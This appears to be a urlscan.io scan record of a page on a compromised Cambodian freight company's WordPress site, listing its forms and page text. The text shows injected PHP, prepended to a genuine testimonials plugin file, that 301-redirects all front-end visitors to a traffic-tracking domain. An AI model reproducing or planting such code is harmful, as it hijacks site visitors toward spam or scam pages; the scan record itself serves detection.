camfreight.com
Open in
urlscan Pro
157.245.205.95
Public Scan
Submitted URL: http://camfreight.com/wp-admin/update/u0qklzu6fi4jfsd0r9e13hhj.php
Effective URL: https://camfreight.com/wp-admin/update/u0qklzu6fi4jfsd0r9e13hhj.php
Submission: On November 03 via api from US — Scanned from SG
Effective URL: https://camfreight.com/wp-admin/update/u0qklzu6fi4jfsd0r9e13hhj.php
Submission: On November 03 via api from US — Scanned from SG
Form analysis
2 forms found in the DOMGET https://camfreight.com/
<form method="get" class="searchform" action="https://camfreight.com/" role="search">
<div class="flex-row relative">
<div class="flex-col flex-grow">
<input type="search" class="search-field mb-0" name="s" value="" id="s" placeholder="Search…" autocomplete="off">
</div>
<div class="flex-col">
<button type="submit" class="ux-search-submit submit-button secondary button icon mb-0" aria-label="Submit">
<i class="icon-search"></i> </button>
</div>
</div>
<div class="live-search-results text-left z-top">
<div class="autocomplete-suggestions" style="position: absolute; display: none; max-height: 300px; z-index: 9999;"></div>
</div>
</form>
POST
<form id="wpmtst-submission-form" method="post" enctype="multipart/form-data" autocomplete="off" novalidate="novalidate">
<div style="display: none;"><input type="hidden" id="wpmtst_form_nonce" name="wpmtst_form_nonce" value="ab49080a2c"><input type="hidden" name="_wp_http_referer" value="/wp-admin/update/u0qklzu6fi4jfsd0r9e13hhj.php"><input type="hidden"
name="action" value="wpmtst_form"><input type="hidden" name="form_id" value="1"><input type="hidden" name="default_category" value=""><input type="hidden" name="category" value=""></div>
<div class="form-field field-client_name"><label for="wpmtst_client_name" class="field-client_name">Full Name</label><span class="required symbol"></span><input id="wpmtst_client_name" type="text" class="text" name="client_name" value=""
placeholder="" required="" tabindex="0"><span class="after"></span></div>
<div class="form-field field-company_name"><label for="wpmtst_company_name" class="field-company_name">Company Name</label><input id="wpmtst_company_name" type="text" class="text" name="company_name" value="" placeholder="" tabindex="0"><span
class="after"></span></div>
<div class="form-field field-post_title"><label for="wpmtst_post_title" class="field-post_title">Heading</label><input id="wpmtst_post_title" type="text" class="text" name="post_title" value="" placeholder="" tabindex="0"><span class="after">A
headline for your testimonial.</span></div>
<div class="form-field field-post_content"><label for="wpmtst_post_content" class="field-post_content">Testimonial</label><span class="required symbol"></span><textarea id="wpmtst_post_content" name="post_content" class="textarea" required=""
placeholder="" tabindex="0"></textarea><span class="after">What do you think about us?</span></div>
<div class="form-field field-star_rating"><label for="wpmtst_star_rating" class="field-star_rating">Star Rating</label>
<div class="strong-rating-wrapper field-wrap in-form">
<fieldset contenteditable="false" id="wpmtst_star_rating" name="star_rating" class="strong-rating" data-field-type="rating" tabindex="0">
<legend>rating fields</legend><input type="radio" id="star_rating-star0" name="star_rating" value="0" checked="checked"><label for="star_rating-star0" title="No stars"></label><input type="radio" id="star_rating-star1" name="star_rating"
value="1"><label for="star_rating-star1" title="1 star"></label><input type="radio" id="star_rating-star2" name="star_rating" value="2"><label for="star_rating-star2" title="2 stars"></label><input type="radio" id="star_rating-star3"
name="star_rating" value="3"><label for="star_rating-star3" title="3 stars"></label><input type="radio" id="star_rating-star4" name="star_rating" value="4"><label for="star_rating-star4" title="4 stars"></label><input type="radio"
id="star_rating-star5" name="star_rating" value="5"><label for="star_rating-star5" title="5 stars"></label>
</fieldset>
</div><span class="after"></span>
</div>
<div class="form-field wpmtst-submit"><label><input type="submit" id="wpmtst_submit_testimonial" name="wpmtst_submit_testimonial" value="Add Testimonial" class="button" tabindex="0"></label></div>
</form>
Text Content
function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); if (!defined('ABSPATH')) exit; // Exit if accessed directly final class Strong_Testimonials_Elementor_Check { /** * Plugin Version * * @since 2.40.5 * @var string The plugin version. */ const VERSION = '2.40.5'; /** * Minimum Elementor Version * * @since 2.40.5 * @var string Minimum Elementor version required to run the elementor block. */ const MINIMUM_ELEMENTOR_VERSION = '2.4.5'; /** * Minimum PHP Version * * @since 2.40.5 * @var string Minimum PHP version required to run the elementor block. */ const MINIMUM_PHP_VERSION = '7.0'; /** * Constructor * * @since 2.40.5 * @access public */ public function __construct() { // Init Plugin add_action('plugins_loaded', array($this, 'init')); } public function init() { if ( ! did_action( 'elementor/loaded' ) ) { return; } // Check for required Elementor version if (!version_compare(ELEMENTOR_VERSION, self::MINIMUM_ELEMENTOR_VERSION, '>=')) { add_action('admin_notices', array($this, 'admin_notice_minimum_elementor_version')); return; } // Check for required PHP version if (version_compare(PHP_VERSION, self::MINIMUM_PHP_VERSION, '<')) { add_action('admin_notices', array($this, 'admin_notice_minimum_php_version')); return; } add_action('elementor/widgets/widgets_registered', array( $this, 'remove_strong_testimonials_widget' ), 15); // Once we get here, We have passed all validation checks so we can safely include our elementor block activation require_once( WPMTST_INC.'elementor/class-strong-elementor-widget-activation.php' ); } /** * Admin notice * * Warning when the site doesn't have a minimum required Elementor version. * * @since 2.40.5 * @access public */ public function admin_notice_minimum_elementor_version() { if ( isset( $_GET['activate'] ) ) { unset( $_GET['activate'] ); } $message = sprintf( esc_html__('"%1$s" requires "%2$s" version %3$s or greater.', 'strong-testimonials'), '' . esc_html__('Strong Testimonials Elementor widget', 'strong-testimonials') . '', '' . esc_html__('Elementor', 'strong-testimonials') . '', self::MINIMUM_ELEMENTOR_VERSION ); printf(' %1$s ', $message); } /** * Admin notice * * Warning when the site doesn't have a minimum required PHP version. * * @since 1.0.0 * @access public */ public function admin_notice_minimum_php_version() { if ( isset( $_GET['activate'] ) ) { unset( $_GET['activate'] ); } $message = sprintf( esc_html__('"%1$s" requires "%2$s" version %3$s or greater.', 'strong-testimonials'), '' . esc_html__('Strong Testimonials Elementor widget', 'strong-testimonials') . '', '' . esc_html__('PHP', 'strong-testimonials') . '', self::MINIMUM_PHP_VERSION ); printf(' %1$s ', $message); } /* Remove WordPress widget because we have a dedicated Elementor Widget */ public function remove_strong_testimonials_widget( $widget_manager ){ $widget_manager->unregister_widget_type( 'strong-testimonials-view-widget' ); } } new Strong_Testimonials_Elementor_Check(); Page not found – Cam Freight Skip to content 404 OOPS! THAT PAGE CAN’T BE FOUND. It looks like nothing was found at this location. Maybe try one of the links below or a search? Required Full Name Company Name HeadingA headline for your testimonial. TestimonialWhat do you think about us? Star Rating rating fields for more information & inquiry E-Mail Us : camfreightceo@camfreight.com info@camfreight.com Skype Chat ID : samdysmith Location Head Office Villa No 85c , 313 Street Beoung Kak 2 Ward, Toul Kork Dist, Phnom Penh, Cambodia. Tel : (855-23)-883 901/ 902 Fax : (855-23)-889 888 Siem Reap City Office +855 63 653 8888 +855 63 964648 Sihanouk Ville City Office +855 346 303003 Bavet City Office +855 446 300300 * Total Visitors: 181,730 Get Quota [contact-form-7 id="693" title="Get Quota"]